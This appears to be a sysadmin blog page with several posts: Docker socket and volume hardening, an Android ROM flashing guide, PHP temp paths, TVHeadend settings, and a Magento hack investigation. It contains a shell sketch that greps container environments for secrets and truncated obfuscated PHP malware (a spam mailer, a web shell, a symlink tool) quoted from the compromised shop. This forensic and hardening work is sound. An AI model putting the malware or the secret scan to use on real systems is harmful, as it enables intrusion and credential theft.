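To illustrate the point: once a container can reach the socket, one Docker API call (e.g. curl --unix-socket /var/run/docker.sock against /containers/CONTAINER_ID/json) returns another container's full environment. A simplified sketch of what an attacker would then look for in that response, using grep instead of a real JSON parser:

```shell
#!/bin/sh
# Simplified sketch: scan a Docker "inspect" JSON blob (as returned by
# the API through the mounted socket) for credential-looking variables.
find_secrets() {
  # split the JSON on commas and keep anything that smells like a secret
  echo "$1" | tr ',' '\n' | grep -i 'password\|secret\|token'
}
```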

In general you can find a lot of articles warning you about exposing the Docker socket. Interestingly these articles were mainly written by system engineers, rarely by developers. Some of them:

Besides the volumes, another risk is the creation of privileged containers. They basically are allowed to do anything, even when they're already running. This means that within a running container you can create a new mount point and mount the host's file system right into the container. For unprivileged containers this would only work during the creation/start of the container. Privileged containers can do that anytime.

My task, being responsible for systems and their stability and security, is to prevent volumes and privileged containers in general. Once more: from a container's point of view, a volume is only needed if persistent data needs to be written to the local filesystem. And if you do that, Docker is not the right solution for you anyway. I started looking, but to my big surprise there is no way to simply prevent Docker containers from creating and mounting volumes. So I created the following wrapper script, which acts as the main "docker" command:

#!/bin/bash
# Simple Docker wrapper script by www.claudiokuenzler.com

ERROR=0
CMD="$@"

echo "Your command was: $CMD" >> /var/log/dockerwrapper.log

if echo "$CMD" | grep -q -e "-v"; then echo "Parameter for volume mounting detected. This is not allowed."; exit 1; fi
if echo "$CMD" | grep -q -e "--volume"; then echo "Parameter for volume mounting detected. This is not allowed."; exit 1; fi
if echo "$CMD" | grep -q -e "--privileged"; then echo "Parameter for privileged containers detected. This is not allowed."; exit 1; fi

/usr/bin/docker.orig $CMD

While this works on the local Docker host, it does not work when the Docker API is used through the Docker socket. And because we decided in the meantime (together with yet another developer, who understands my concerns and will be in charge of the Docker deployments) to use Rancher as the overlying administration interface (which in the end uses the Docker socket through a local agent), the wrapper script is not enough. So a prevention should be configurable in either Docker or Rancher; most importantly, Docker itself should support security configurations to prevent certain functions or container settings (comparable to disable_functions in PHP).
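One way to make such a wrapper more robust - a sketch, not the script above - is to inspect each argument individually instead of grepping the whole command line; a substring match on "-v" would, for example, also reject an image name that merely contains those characters:

```shell
#!/bin/sh
# Sketch: check docker arguments one by one so only the real flags are
# caught, not substrings inside image or container names.
deny_args() {
  for arg in "$@"; do
    case "$arg" in
      -v|-v=*|--volume|--volume=*|--volumes-from|--volumes-from=*|--privileged)
        echo "Parameter $arg is not allowed." >&2
        return 1 ;;
    esac
  done
  return 0
}
```

In the wrapper this would be called as deny_args "$@" before handing the arguments on to /usr/bin/docker.orig.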

In my trials to prevent Docker mounting host volumes, I also came across a plugin called docker-novolume-plugin. This plugin prevents creation of data volumes - but unfortunately does not prevent the mounting of the host's filesystem. I opened up a feature request issue on the Github repository but as of today it's not resolved.

Another potential solution could have been an AppArmor profile for the Docker engine. But an AppArmor profile is only in place for a running container itself, not for the engine creating and managing the containers:

Docker automatically loads container profiles. The Docker binary installs a docker-default profile in the /etc/apparmor.d/docker file. This profile is used on containers, not on the Docker Daemon.

I also turned to Rancher and created a feature request issue on their Github repo as well. To be honest, with little hope that this will be implemented soon, because as of this writing the Rancher repo still has over 1200 open issues to be addressed and solved.

So neither Docker, nor Rancher, nor AppArmor are at this moment capable of preventing dangerous (and unnecessary) container settings.

How to proceed from here? I didn't want to "block" the technology, yet "volume" and "privileged" are clear no-gos for a production environment (once again, they're OK in development environments). I started digging around in the Rancher API, which is actually a very nice and easy to learn API. It turns out a container can be stopped and deleted/purged through the API using an authorization key and password. I decided to combine this with our Icinga2 monitoring already in place. The goal: on each Docker host, a monitoring plugin is called every other minute. This plugin goes through every container, using the IDs from the "docker ps" output.

root@dockerhost:~# docker ps | grep claudio
CONTAINER ID  IMAGE           COMMAND       CREATED        STATUS         PORTS     NAMES
5a87a58982f9  ubuntu:14.04.3  "/bin/bash"   5 seconds ago  Up 4 seconds             r-claudiotest

This ID represents the "externalId" which can be looked up in the Rancher API. Using this information, the Rancher API can be queried to find out about the data volumes of this container in the given environment (1a12), using the "externalId_prefix" filter:

curl -s -u "ACCESSUSER:ACCESSKEY" -X GET -H 'Accept: application/json' -H 'Content-Type: application/json' -d '{}' 'https://rancher.example.com/v1/projects/1a12/containers?externalId_prefix=5a87a58982f9' | jshon -e data -a -e dataVolumes
[
 "\/:\/tmp"
]

As soon as something shows up in the array, this is considered bad and further action takes place. The Docker "id" within the Rancher environment can be figured out, too:

curl -s -u "ACCESSUSER:ACCESSKEY" -X GET -H 'Accept: application/json' -H 'Content-Type: application/json' -d '{}' 'https://rancher.example.com/v1/projects/1a12/containers?externalId_prefix=5a87a58982f9' | jshon -e data -a -e id
"1i22342"

Using this "id", the bad container can then be stopped and deleted/purged:

curl -s -u "ACCESSUSER:ACCESSKEY" -X POST -H 'Accept: application/json' -H 'Content-Type: application/json' -d '{"remove":true, "timeout":0}' 'https://rancher.example.com/v1/projects/1a12/instances/1i22342/?action=stop'

Still, this does not prevent the creation and mounting of volumes or the host's filesystem, nor does it prevent privileged containers upon creation. But it ensures that such containers - created on purpose, by error or through a hack - are immediately destroyed; hopefully before they can do any harm. I sincerely hope that Docker will look more into security and Docker settings though. Without such workarounds and efforts - and a cloud-ready application - it's not advisable to run Docker containers in production. And most importantly: your developer colleagues need the technical understanding of where and when Docker containers make sense.
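The core decision of that plugin can be sketched roughly like this (the function name and message texts are illustrative, not our actual plugin; the exit codes follow the Nagios/Icinga convention where 0 is OK and 2 is CRITICAL):

```shell
#!/bin/sh
# Sketch of the plugin's decision step: the dataVolumes array from the
# Rancher API is passed in; anything other than an empty array means
# the container mounts volumes and gets flagged.
check_datavolumes() {
  volumes=$(echo "$1" | tr -d '[:space:]')
  if [ -z "$volumes" ] || [ "$volumes" = "[]" ]; then
    echo "OK - container uses no data volumes"
    return 0
  fi
  echo "CRITICAL - container mounts data volumes: $1"
  return 2   # the real plugin would now stop/purge it via the API
}
```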

For now the path to Docker continues with the mentioned workaround and there will be a steep learning curve, probably with some inevitable problems at times - but in the end (hopefully) a stable, dynamic and scalable production environment running Docker containers.

How did YOU tackle these security issues? What kind of workarounds or top layer orchestration are you using to prevent the dangerous settings? Please leave a comment, that would be much appreciated!

 

Install Lineage 14 (Android 7 Nougat) on Samsung Galaxy S5 Plus G901F
Monday - Dec 12th 2016 - by - (6 comments)

It has been a while since I wrote an Android article - because it has been a while since I saw an update for the Samsung Galaxy S5 Plus (model number G901F). Back in July 2015 I wrote two articles for this device:

Since July 2015 I kept using CM 12.0 (Android 5.0) on the G901F. CM 12.1 turned out to be a battery burner, and 12.0, although no longer receiving updates, was still much better than the original stock Android (TouchWiz) from Samsung.

Out of curiosity I checked if there was a recent version and, to my big surprise, someone really cared about that device and created new CM versions (see this XDA forums thread).

So this article describes how you can install CyanogenMod 14 (Android 7) on your Samsung Galaxy S5 Plus (G901F). But first some preparations need to be done. As it turns out, the newer Android versions require a newer bootloader and modem driver; I had to learn that the hard way. Please read and follow the following steps carefully.

1. You understand that you most likely void your warranty of your Samsung device. As with all other tutorials, you are responsible for your own actions etc bla bla. If you brick/destroy your device it's your own fault.

2. Download the newest version of Odin from http://odindownload.com/download. Odin is a tool to install/flash firmware to Samsung devices. As of this writing I downloaded and installed Odin 3.12.3.

3. Download newer bootloader and modem driver for this phone with version CPE1. Original links were given to me in the XDA forums by user ruchern:

Some notes on the Bootloader (BL) and Modem (CP) versions: Besides CPE1 I also tried versions BOH4 (which always rebooted the phone during the Wifi screen of the Android setup) and CPHA (which never completely booted Android).

4. Download a new Recovery ROM. I chose TWRP which can be downloaded here: http://teamw.in/devices/samsunggalaxys5plus.html . Download the "tar" package. As of this writing the current version was twrp-3.0.2-0-kccat6.img.tar. Note: In my older article I used CWM recovery. TWRP offers to mount the phone as a USB drive while in Recovery, which is very helpful for the installation of zip files.

5. Download and install the Samsung USB drivers (SAMSUNG_USB_Driver_for_Mobile_Phones.zip) if you haven't already. You can download this from http://developer.samsung.com/technical-doc/view.do?v=T000000117.

6. Power off the Galaxy S5.

7. Boot your phone into the Download Mode by pressing the following buttons together: [Volume Down] + [Home] + [Power] until you see a warning triangle. Accept the warning by pressing the [Volume Up] button.

G901F Downloader Boot 

8. Start the Odin executable. You might have to unzip/unpack the downloaded Odin version first. 

9. Connect the phone to the computer with the phone's USB cable. In Odin one of the ID:COM fields should now show a connection. In the "Log" field you should see an entry like "Added!!".

10. Let's start by installing TWRP recovery. In Odin click on the "AP" button and select the tar file from twrp (twrp-3.0.2-0-kccat6.img.tar).

G901F Odin install TWRP

Then click on Start. The phone will reboot (unless you have unticked auto-reboot in the Odin options). Let the phone finish booting your existing OS and then power off the phone again. Exit Odin and disconnect the USB cable.

11. This is for verification: Boot the phone into Recovery mode by pressing the following buttons together: [Volume Up] + [Home] + [Power] until you see blue text at the top. You should now see the TWRP Recovery. If this worked for you - great, we can proceed. If not, try again or try to install another Recovery (check out Samsung Galaxy S5 (G901F): Pain to install custom recovery or Cyanogenmod again). Power off the Galaxy S5.

G901F TWRP Recovery 

12. Boot your phone into the Download Mode again by pressing the following buttons together: [Volume Down] + [Home] + [Power] until you see a warning triangle. Accept the warning by pressing the [Volume Up] button.

13. Start Odin again and connect your phone with the USB cable. This time we're going to flash the new Bootloader (BL) and Modem (CP) versions. Click on the "BL" button and select the bootloader file (G901FXXU1CPE1_bootloader.tar.md5). Click on the "CP" button and select the modem file (G901FXXU1CPE1_modem.tar.md5).

G901F Bootloader Odin 

G901F Odin Modem Flash 

Then click on the "Start" button. The phone will reboot again, once done.

14. Now I'm not sure whether your old Android installation will still boot with the new bootloader or not. If it doesn't, even after several minutes, and is stuck on the same screen, just power off the phone (in the worst case by pulling the battery). If it does still boot your old Android OS, power off the phone normally. Disconnect the USB cable and exit Odin if you haven't already.

15. Boot the phone into Recovery mode by pressing the following buttons together: [Volume Up] + [Home] + [Power] until you see blue text at the top. Connect the USB cable. In TWRP tap on "Mount". In the next window tap on "Mount USB Storage". Your phone should now appear as a USB storage device on your computer and you can simply transfer files to the phone.

G901F TWRP Menu G901F TWRP Mount G901F TWRP Mount

16. On your computer download CM14 from http://ionkiwi.nl/archive/view/4/samsung-galaxy-s5--g901f--kccat6xx. In my case, I downloaded the latest CM 14.0 at the time (cm-14.0-20161208-UNOFFICIAL-kccat6xx.zip). Once the download is complete, transfer the file to your phone using the mounted USB storage.

17. On your computer download the Google Apps (GApps) from http://opengapps.org/. Select Platform: ARM, Android: 7.0, Variant: mini (note: the default "stock" variant didn't work for me; it caused a crash of "Google Play Services" during the Android setup after the initial boot). This should give you a file like open_gapps-arm-7.0-mini-20161211.zip. Once the download is complete, transfer the file to your phone using the mounted USB storage.

G901F Placing zips on internal SD card 

18. On your phone in TWRP go back to the main screen and tap on "Wipe". Swipe the blue bar to the right for a Factory Reset.

G901F TWRP Wipe G901F Wipe 

19. In TWRP go back to the main screen and tap on "Install". Cool in TWRP: You can select several zip files to install one after another. So first select the cm-14 zip file, then tap on "Add more Zips" and then select the open_gapps zip file. After you selected the open_gapps zip file, tick the "Reboot after installation is complete" checkbox. Then swipe the blue bar to the right to install the zip files ("Swipe to confirm Flash").

G901F Install CM14 zip G901F Install CM14 zip G901F Install CM14 zip

20. After the installation the phone reboots and the CyanogenMod robo logo should appear. Give the phone some time to boot; mine took around 3 minutes for the first boot. Then the Android setup starts up - this I really don't need to explain.

G901F CM14 boot G901F CM14 Android Setup G901F Android 7 Nougat

21. After the Android setup you can check out your phone's version in Settings -> About.

G901F Android Nougat CM14 G901F Android 7 Cyanogenmod 14

Enjoy your phone not being dead :D

PS: I created a stale mirror of the mentioned files in case the original links don't work in the future: https://www.claudiokuenzler.com/downloads/G901F-CM14/  

Update January 3rd 2017: As you may have heard, the CyanogenMod project is dead. A fork of CM, called Lineage, is available though. This howto of course also works for the newer Lineage zip files. I changed the title of this howto accordingly.

 

PHP: sys_temp_dir is not the same as upload_tmp_dir, it stays /tmp
Friday - Dec 9th 2016 - by - (0 comments)

Today I realized that handling temporary paths in PHP is not always very clear. I thought setting upload_tmp_dir and session.save_path in a virtual host would be enough to keep the temporary files of vhosts separated and keep applications working.

Well, at least in the past ~15 years of on-and-off work with PHP, and with thousands of virtual hostings, I never had any problems with the temporary paths in combination with open_basedir. Until today, when someone wasn't able to write into the temp path because of an open_basedir restriction.

It turns out that the PHP script, which wanted to create a temporary file, was using the function sys_get_temp_dir(). And this function always returned /tmp. I tested this with the following code:

$temp_file = sys_get_temp_dir();
echo $temp_file;

The result was always /tmp, even with all the following settings set for this virtual host:

upload_tmp_dir = /var/www/user/phptmp/
session.save_path = /var/www/user/phptmp/

As this didn't help, I even tried setting an Apache environment variable:

SetEnv TMPDIR /var/www/user/phptmp/

Although the env vars could be read by PHP (verified in phpinfo), none of that helped. The function sys_get_temp_dir() still returned /tmp.
Unfortunately this web server is still using PHP 5.3, where this is not configurable. A new option, sys_temp_dir, was only added in PHP 5.5, as can be seen on http://php.net/manual/en/ini.list.php:

Name          Default   Changeable         Changelog
sys_temp_dir     ""     PHP_INI_SYSTEM     Available since PHP 5.5.0.

There are two workarounds to help in this scenario:

1) The PHP script/application shouldn't use sys_get_temp_dir() to define its own temporary path. It should rather read the value from upload_tmp_dir. If you programmed the script yourself, that shouldn't be much effort.

2) Adapt the open_basedir path to include /tmp.

As the affected web server still runs with PHP 5.3 and the script is part of a web application, I went for workaround 2 and added /tmp to the open_basedir value.
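For reference, on a web server with PHP 5.5 or newer the cleaner fix would be to set sys_temp_dir per virtual host and make sure the temp path is covered by open_basedir. A sketch using this article's example path (mod_php in an Apache vhost assumed; directive placement may differ in your setup):

```apache
# inside the vhost of the affected site (mod_php assumed):
php_admin_value sys_temp_dir      /var/www/user/phptmp/
php_admin_value upload_tmp_dir    /var/www/user/phptmp/
php_admin_value session.save_path /var/www/user/phptmp/
# open_basedir must cover the temp path
php_admin_value open_basedir      /var/www/user/
```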

 

TVHeadend Mux Scan Settings for Cablecom and Thurcom (Switzerland)
Tuesday - Dec 6th 2016 - by - (0 comments)

If you're living in Switzerland and want to configure your TVHeadend settings to scan the Swiss TV providers Cablecom or Thurcom (region of Wil SG), then you're in the right place.

It took me some time to finally find the correct mux settings, but here they are.

Network:

TVHeadend Network Settings Thurcom

Note: According to the Thurcom website, the network ID should be set to 360 if no smartcard is attached.

(First) Mux:

TVHeadend Mutex Mux Thurcom Cablecom

Note: The above mentioned hint tells you to use the frequency 314 MHz. In my case this didn't work. I was much more successful with 826 MHz, and I left the symbol rate at 0.

Then I forced the scan on the network and it got me all the scan results and channels:

TVHeadend Thurcom Mutex Scan

TVHeadend Thurcom Channels Services

Attention if you come across errors like these (scan no data, failed):

2016-12-03 19:01:35.001 mpegts: 314MHz in DVB-C Network - tuning on CXD2837 DVB-C DVB-T/T2 : DVB-C #0
2016-12-03 19:01:35.001 opentv-ausat: registering mux 314MHz in DVB-C Network
2016-12-03 19:01:35.019 subscription: 000B: "scan" subscribing to mux "314MHz", weight: 5, adapter: "CXD2837 DVB-C DVB-T/T2 : DVB-C #0", network: "DVB-C Network", service: "Raw PID Subscription"
2016-12-03 19:01:40.148 mpegts: 314MHz in DVB-C Network - scan no data, failed
2016-12-03 19:01:40.148 subscription: 000B: "scan" unsubscribing
2016-12-03 19:01:40.154 mpegts: 250MHz in DVB-C Network - tuning on CXD2837 DVB-C DVB-T/T2 : DVB-C #0
2016-12-03 19:01:40.154 opentv-ausat: registering mux 250MHz in DVB-C Network
2016-12-03 19:01:40.183 subscription: 000D: "scan" subscribing to mux "250MHz", weight: 5, adapter: "CXD2837 DVB-C DVB-T/T2 : DVB-C #0", network: "DVB-C Network", service: "Raw PID Subscription"
2016-12-03 19:01:41.243 linuxdvb: CXD2837 DVB-C DVB-T/T2 : DVB-C #0 - poll TIMEOUT
2016-12-03 19:01:45.000 mpegts: 250MHz in DVB-C Network - scan no data, failed
2016-12-03 19:01:45.000 subscription: 000D: "scan" unsubscribing
2016-12-03 19:02:12.680 mpegts: 250MHz in DVB-C Network - tuning on CXD2837 DVB-C DVB-T/T2 : DVB-C #0
2016-12-03 19:02:12.680 subscription: 000E: "scan" subscribing to mux "250MHz", weight: 6, adapter: "CXD2837 DVB-C DVB-T/T2 : DVB-C #0", network: "DVB-C Network", service: "Raw PID Subscription"
2016-12-03 19:02:17.000 mpegts: 250MHz in DVB-C Network - scan no data, failed

This is probably due to a defective antenna cable. I hit the problem myself with an antenna cable several meters long that was still rolled up. Once I switched to a shorter, stretched-out cable, the errors disappeared.

 

Magento shop 1.9.2.4 hacked, possibly through Connect Manager
Monday - Dec 5th 2016 - by - (0 comments)

Today I got alerts about a spamming web server and quickly identified the document root as a Magento web shop installation.

mail() on [/srv/websites/shop.example.com/magento/ljamailer.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d 
code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code:220]: To: email.result@yahoo.com -- Headers: From : Miler Info <malingnya@darisinibosku.com>

So the bad file here is of course ljamailer.php. The question is: how did it get on the server? An overview of the document root already allows several conclusions:

webserver:/srv/websites/shop.example.com/magento # ls -ltr
total 868
-rw-r--r--  1 root   root   2112 Nov 13  2015 test.php
drwxrwxrwx  3 inmed  web    4096 Sep 28 10:58 pkginfo
drwxrwxrwx  5 inmed  web    4096 Sep 28 10:58 skin
-rw-rw-rw-  1 wwwrun www    2240 Sep 28 10:58 mage
-rw-rw-rw-  1 wwwrun www    6451 Sep 28 10:58 .htaccess
drwxrwxrwx  2 wwwrun www    4096 Sep 28 10:59 includes
drwxrwxrwx  2 wwwrun www    4096 Sep 28 10:59 shell
-rw-rw-rw-  1 wwwrun www     886 Sep 28 10:59 php.ini.sample
drwxrwxrwx 14 inmed  web    4096 Sep 28 10:59 media
-rw-rw-rw-  1 wwwrun www    6460 Sep 28 10:59 install.php
-rw-rw-rw-  1 wwwrun www    2323 Sep 28 10:59 index.php.sample
-rw-rw-rw-  1 wwwrun www    5970 Sep 28 10:59 get.php
-rw-rw-rw-  1 wwwrun www    1150 Sep 28 10:59 favicon.ico
drwxrwxrwx  3 wwwrun www    4096 Sep 28 10:59 errors
-rw-rw-rw-  1 wwwrun www    1639 Sep 28 10:59 cron.sh
-rw-rw-rw-  1 wwwrun www    2915 Sep 28 10:59 cron.php
-rw-rw-rw-  1 wwwrun www    3141 Sep 28 10:59 api.php
-rw-rw-rw-  1 wwwrun www  590092 Sep 28 10:59 RELEASE_NOTES.txt
-rw-rw-rw-  1 wwwrun www   10421 Sep 28 10:59 LICENSE_AFL.txt
-rw-rw-rw-  1 wwwrun www   10410 Sep 28 10:59 LICENSE.txt
-rw-rw-rw-  1 wwwrun www   10679 Sep 28 10:59 LICENSE.html
-rw-rw-rw-  1 wwwrun www    5351 Sep 28 10:59 .htaccess.sample
drwxrwxrwx 16 inmed  web    4096 Sep 28 10:59 lib
drwxrwxrwx 10 inmed  web    4096 Sep 28 11:01 downloader
drwxrwxrwx 10 inmed  web    4096 Dec  4 22:53 var
drwxrwxrwx 16 inmed  web    4096 Dec  4 22:53 js
-rw-rw-rw-  1 wwwrun www   25862 Dec  4 23:05 configurations.php
drwxr-xr-x  2 wwwrun www    4096 Dec  4 23:22 tmp
-rw-r--r--  1 wwwrun www   13639 Dec  4 23:27 Sym.php
drwxr-xr-x  2 wwwrun www    4096 Dec  4 23:28 sym
-rw-r--r--  1 wwwrun www   25862 Dec  4 23:40 bootstrap.php
drwxrwxrwx  6 inmed  web    4096 Dec  4 23:40 app
-rw-r--r--  1 wwwrun www   49449 Dec  5 03:43 ljamailer.php
-rw-r--r--  1 wwwrun www    2391 Dec  5 03:43 index.php

1) Several recent modifications happened on December 4th and 5th.
2) The current permissions are catastrophic: wwwrun (the Apache user) is able to modify everything. I'm not a Magento specialist, but I doubt that the shop needs write permissions on every file and folder.
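Two follow-ups suggest themselves here: finding other recently changed PHP files (possible additional backdoors) and removing the group/world write bits. A sketch with the document root as a parameter - the find/chmod calls are generic cleanup, not Magento-specific advice:

```shell
#!/bin/sh
# Sketch: list PHP files changed within the last N days (hacker uploads
# often cluster around the same dates) and strip group/other write
# permissions recursively.
audit_docroot() {
  docroot="$1"
  days="${2:-3}"
  # candidate backdoors: recently modified PHP files
  find "$docroot" -name '*.php' -mtime -"$days"
  # the Apache user should not be able to rewrite the whole shop
  chmod -R go-w "$docroot"
}
```

Whether chmod alone is enough depends on what the shop actually needs to write (media, var); test on a staging copy first.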

Taking a look at ljamailer.php, there is no big surprise: obfuscated PHP code appeared:

# more ljamailer.php
<?php /*obfuscated 3.0 by Lancarjaya*/ $oiIhAiaoaoASA="38c37bd5alz15n21to7is3ade2a49g9f1:69";$s0oooo0000h41="claudea-^*)nopqghyz_+(ijkmralbscstuvwdef*&x-Lanca
rjaya";$oiIohAhAaASSA = $oiIhAiaoaoASA{5}.$oiIhAiaoaoASA{8}.$oiIhAiaoaoASA{20}.$oiIhAiaoaoASA{24}.$oiIhAiaoaoASA{34}.$oiIhAiaoaoASA{27}.$s0oooo0000h41{19}.$s0
oooo0000h41{4}.$s0oooo0000h41{5}.$s0oooo0000h41{31}.$s0oooo0000h41{12}.$s0oooo0000h41{37}.$s0oooo0000h41{38};$oiIoASAhAiaoahoSAShh=file(__FILE__);$s0oo0000ooh
41=$s0oooo0000h41{30}.$s0oooo0000h41{33};$s0oo0000

I didn't bother to decode it, as in the end it probably turns out to be a mailing/spamming form. More interesting is the timestamp of when the file was uploaded:

120.188.94.254 - - [05/Dec/2016:03:43:05 +0100] "POST /configurations.php HTTP/1.1" 200 5439 "http://shop.example.com/configurations.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [05/Dec/2016:03:43:12 +0100] "GET /ljamailer.php HTTP/1.1" 200 2524 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [05/Dec/2016:03:43:37 +0100] "POST /ljamailer.php HTTP/1.1" 200 3921 "http://shop.example.com/ljamailer.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [05/Dec/2016:03:44:04 +0100] "POST /ljamailer.php HTTP/1.1" 200 3995 "http://shop.example.com/ljamailer.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [05/Dec/2016:03:44:18 +0100] "POST /ljamailer.php HTTP/1.1" 200 6272 "http://shop.example.com/ljamailer.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [05/Dec/2016:03:50:47 +0100] "POST /ljamailer.php HTTP/1.1" 200 4122 "http://shop.example.com/ljamailer.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"

That's right: a POST on configurations.php, which itself was uploaded on December 4th. Let's take a look at configurations.php:

# more configurations.php
<?php
$idc = "=Ew/P7//fvf/e20P17/LpI7L34PwCabTrwvXJbPWN3TV+/T/mE3R5//n3zfJlHOEt/33HXCPomvNr8X9Of74N/C8u0KblTAt8+AAh3gjnKzeZWDyELiXuc/7SOiIls0QNVmiN1MH5kCOokgIho0VyV
lIZHndcCwaMgR5nwCh/GxaYNISzsK91a53vpwsnQTRCFXxDaksGVhhIOe2jUvc5hdLsdwYpT5Zv6jPE5ROlFxfzMqQfVLiAxq6/bkdRSp5I2a2ZjNfdr5moDVYbFCA6wOJdun6y30g4lv+4OL+wUVJrAZWuv6o
Xc7lHJ+jJTCGqBFKG3C1zkwLoPLQhYTQ/d5Y3K4zlhpznx7LFjlMHLLdTBunJneZugalBjR/Gpv5G/5Is6+afGoQCSDc6thAuYyC6jIsCuWATFRG6/zdlbPTJfVyM1a3wZBXHbITk2dnXV1+DDqpD3ybWE4f90
cYEglGMxuKik8QJoSP/mg16EWDi6K7EzQ/N6

No big surprise there either. Interestingly, this file was uploaded twice: once with the filename configurations.php, once as bootstrap.php. Both files are identical in size and content.

# more bootstrap.php
<?php
$idc = "=Ew/P7//fvf/e20P17/LpI7L34PwCabTrwvXJbPWN3TV+/T/mE3R5//n3zfJlHOEt/33HXCPomvNr8X9Of74N/C8u0KblTAt8+AAh3gjnKzeZWDyELiXuc/7SOiIls0QNVmiN1MH5kCOokgIho0VyV
lIZHndcCwaMgR5nwCh/GxaYNISzsK91a53vpwsnQTRCFXxDaksGVhhIOe2jUvc5hdLsdwYpT5Zv6jPE5ROlFxfzMqQfVLiAxq6/bkdRSp5I2a2ZjNfdr5moDVYbFCA6wOJdun6y30g4lv+4OL+wUVJrAZWuv6o
Xc7lHJ+jJTCGqBFKG3C1zkwLoPLQhYTQ/d5Y3K4zlhpznx7LFjlMHLLdTBunJneZugalBjR/Gpv5G/5Is6+afGoQCSDc6thAuYyC6jIsCuWATFRG6/zdlbPTJfVyM1a3wZBXHbITk2dnXV1+DDqpD3ybWE4f90
cYEglGMxuKik8QJoSP/mg16EW

When configurations.php or bootstrap.php was opened in a browser, a web shell appeared:

Web Shell

Another interesting discovery was the file Sym.php:

webserver:/srv/websites/shop.example.com/magento # cat Sym.php
<?php /* Cod3d by Mr.Alsa3ek and Al-Swisre  */$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$OOO000O00=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};$O0O000O00=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};$O0O000O0O=$O0O000O00.$OOO000000{11};$O0O000O00=$O0O000O00.$OOO000000{3};$O0O00OO00=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$OOO00000O=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};$OOO0O0O00=__FILE__;$OO00O0000=0x2f24;eval($OOO0000O0('JE8wMDBPME8wMD0kT09PMDAwTzAwKCRPT08wTz...

In the browser the script looked something like this:

Symlink hack 

In the access logs I saw the following requests:

120.188.94.254 - - [04/Dec/2016:23:27:50 +0100] "GET /Sym.php HTTP/1.1" 200 1019 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
